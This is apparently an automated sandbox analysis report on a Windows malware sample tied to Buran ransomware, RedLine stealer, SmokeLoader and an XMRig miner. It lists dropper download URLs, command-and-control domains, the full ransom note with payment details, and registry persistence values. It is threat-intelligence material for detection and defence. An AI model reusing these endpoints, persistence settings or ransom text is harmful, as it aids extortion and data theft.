buran | d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a

Analysis

max time kernel
151s
max time network
146s
platform
windows10_x64
resource
win10v20210408
submitted
29-08-2021 21:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
Size

213KB
MD5

eee4f13fdcdbeba5471c7bf29dd5f182
SHA1

714422588a4841a5dd84cbb1586521de2af67a7a
SHA256

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a
SHA512

2ba10fe8e8291a10353be17b1f0e76bdacb535f2eb469438f88b658282166784528dd0a25dd9514f32a9a17edcb6501716b9ebb797236bbc84b68f9783f16257

Score

10^/10

buran redline smokeloader xmrig agilenet backdoor discovery infostealer miner persistence ransomware spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.zippyshare.cc/1630257393/download

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.zippyshare.cc/1630257468/download

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.zippyshare.cc/1630258463/download

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note

!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 590$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 315-5F7-755 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

smokeloader

Version

2020

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32

Signatures

Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
ransomware buran

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

331A.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Twitch\\TwitchUpdate.exe\","	331A.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4080-430-0x000000000041C5A2-mapping.dmp	family_redline
behavioral1/memory/4080-440-0x0000000005280000-0x0000000005886000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/896-472-0x00000001402F327C-mapping.dmp	xmrig
behavioral1/memory/896-482-0x0000000140000000-0x0000000140763000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	Process
38	1544	powershell.exe
44	3088	powershell.exe
48	1852	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 15 IoCs

Processes:

2DF6.exe302A.exe3192.exe331A.exesvchost.exesvchost.exeWindowsHost.exeWindowsAPI.exesvhost.exeSafeWindows.exe331A.exeDriverVideocard.exesvhost.exe331A.exesihost64.exe

pid	Process
2952	2DF6.exe
4080	302A.exe
2072	3192.exe
408	331A.exe
2388	svchost.exe
484	svchost.exe
3928	WindowsHost.exe
3548	WindowsAPI.exe
3472	svhost.exe
3880	SafeWindows.exe
3716	331A.exe
3916	DriverVideocard.exe
4080	svhost.exe
3540	331A.exe
2268	sihost64.exe

Deletes itself 1 IoCs

Processes:

pid	Process
3016

Obfuscated with Agile.Net obfuscator 3 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/files/0x000200000001ab33-334.dat	agile_net
behavioral1/files/0x000200000001ab33-341.dat	agile_net
behavioral1/files/0x000200000001ab33-431.dat	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

2DF6.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	2DF6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start"	2DF6.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	Process
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\F:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
23	geoiptool.com

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

302A.exe

pid	Process
4080	302A.exe
4080	302A.exe
4080	302A.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe331A.exesvhost.exeSafeWindows.exe

description	pid	Process	procid_target
PID 3128 set thread context of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 408 set thread context of 3716	408	331A.exe	126
PID 3472 set thread context of 4080	3472	svhost.exe	134
PID 3880 set thread context of 896	3880	SafeWindows.exe	140

Drops file in Program Files directory 64 IoCs

Processes:

svchost.exe

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\3082\MSO.ACL.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_zh_HK.properties.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\jvm.hprof.txt	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	svchost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\http.luac	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ppd.xrm-ms.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-phn.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL092.XML.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-pl.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ANALYS32.XLL	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\proof.en-us.msi.16.en-us.tree.dat.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\STUDIO.ELM.payfast.315-5F7-755	svchost.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-125_contrast-white.png	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-pl.xrm-ms.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\mscss7wre_es.dub	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\ThinAppXManifest.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_OEM_Perp-ppd.xrm-ms.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_KMS_Automation-ul.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.png	svchost.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\psfont.properties.ja.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\THMBNAIL.PNG	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uk\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT	svchost.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fy.txt.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-pl.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\METCONV.TXT.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EVRGREEN\THMBNAIL.PNG	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ul-oob.xrm-ms.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WordNaiveBayesCommandRanker.txt	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\jawt.lib.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\misc.exe.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.en-us.xml	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ppd.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10R.CHM	svchost.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lij.txt	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsSplashScreen.scale-125.png	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jdeps.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-windows.jar.payfast.315-5F7-755	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ExcelCtxUIFormulaBarModel.bin	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BOOKOSBI.TTF	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
3556	schtasks.exe
1312	schtasks.exe
2100	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
1852	vssadmin.exe

Modifies registry class 1 IoCs

Processes:

331A.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	331A.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

2DF6.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	2DF6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	2DF6.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe

pid	Process
3224	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
3224	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
3016

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe

pid	Process
3224	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016
3016

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe302A.exepowershell.exepowershell.exeWMIC.exevssvc.exe

description	pid	Process
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeDebugPrivilege	3088	powershell.exe
Token: SeDebugPrivilege	4080	302A.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeIncreaseQuotaPrivilege	2856	WMIC.exe
Token: SeSecurityPrivilege	2856	WMIC.exe
Token: SeTakeOwnershipPrivilege	2856	WMIC.exe
Token: SeLoadDriverPrivilege	2856	WMIC.exe
Token: SeSystemProfilePrivilege	2856	WMIC.exe
Token: SeSystemtimePrivilege	2856	WMIC.exe
Token: SeProfSingleProcessPrivilege	2856	WMIC.exe
Token: SeIncBasePriorityPrivilege	2856	WMIC.exe
Token: SeCreatePagefilePrivilege	2856	WMIC.exe
Token: SeBackupPrivilege	2856	WMIC.exe
Token: SeRestorePrivilege	2856	WMIC.exe
Token: SeShutdownPrivilege	2856	WMIC.exe
Token: SeDebugPrivilege	2856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2856	WMIC.exe
Token: SeRemoteShutdownPrivilege	2856	WMIC.exe
Token: SeUndockPrivilege	2856	WMIC.exe
Token: SeManageVolumePrivilege	2856	WMIC.exe
Token: 33	2856	WMIC.exe
Token: 34	2856	WMIC.exe
Token: 35	2856	WMIC.exe
Token: 36	2856	WMIC.exe
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeShutdownPrivilege	3016
Token: SeCreatePagefilePrivilege	3016
Token: SeBackupPrivilege	1640	vssvc.exe
Token: SeRestorePrivilege	1640	vssvc.exe
Token: SeAuditPrivilege	1640	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2856	WMIC.exe
Token: SeSecurityPrivilege	2856	WMIC.exe
Token: SeTakeOwnershipPrivilege	2856	WMIC.exe
Token: SeLoadDriverPrivilege	2856	WMIC.exe
Token: SeSystemProfilePrivilege	2856	WMIC.exe
Token: SeSystemtimePrivilege	2856	WMIC.exe
Token: SeProfSingleProcessPrivilege	2856	WMIC.exe
Token: SeIncBasePriorityPrivilege	2856	WMIC.exe
Token: SeCreatePagefilePrivilege	2856	WMIC.exe
Token: SeBackupPrivilege	2856	WMIC.exe
Token: SeRestorePrivilege	2856	WMIC.exe
Token: SeShutdownPrivilege	2856	WMIC.exe
Token: SeDebugPrivilege	2856	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2856	WMIC.exe
Token: SeRemoteShutdownPrivilege	2856	WMIC.exe
Token: SeUndockPrivilege	2856	WMIC.exe
Token: SeManageVolumePrivilege	2856	WMIC.exe
Token: 33	2856	WMIC.exe
Token: 34	2856	WMIC.exe
Token: 35	2856	WMIC.exe
Token: 36	2856	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

302A.exe

pid	Process
4080	302A.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid	Process
3016

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe3192.execmd.exe2DF6.exesvchost.exe

description	pid	Process	procid_target
PID 3128 wrote to memory of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 3128 wrote to memory of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 3128 wrote to memory of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 3128 wrote to memory of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 3128 wrote to memory of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 3128 wrote to memory of 3224	3128	d01b3ea3b793e2d269f00eadf0de7c751a2a2e08ad8373b8f025eff5d77dbb8a.exe	77
PID 3016 wrote to memory of 2952	3016		79
PID 3016 wrote to memory of 2952	3016		79
PID 3016 wrote to memory of 2952	3016		79
PID 3016 wrote to memory of 4080	3016		80
PID 3016 wrote to memory of 4080	3016		80
PID 3016 wrote to memory of 4080	3016		80
PID 3016 wrote to memory of 2072	3016		82
PID 3016 wrote to memory of 2072	3016		82
PID 3016 wrote to memory of 408	3016		83
PID 3016 wrote to memory of 408	3016		83
PID 3016 wrote to memory of 1872	3016		84
PID 3016 wrote to memory of 1872	3016		84
PID 3016 wrote to memory of 1872	3016		84
PID 3016 wrote to memory of 1872	3016		84
PID 2072 wrote to memory of 3748	2072	3192.exe	85
PID 2072 wrote to memory of 3748	2072	3192.exe	85
PID 3748 wrote to memory of 1544	3748	cmd.exe	87
PID 3748 wrote to memory of 1544	3748	cmd.exe	87
PID 2952 wrote to memory of 2388	2952	2DF6.exe	88
PID 2952 wrote to memory of 2388	2952	2DF6.exe	88
PID 2952 wrote to memory of 2388	2952	2DF6.exe	88
PID 3016 wrote to memory of 4040	3016		89
PID 3016 wrote to memory of 4040	3016		89
PID 3016 wrote to memory of 4040	3016		89
PID 3016 wrote to memory of 3464	3016		90
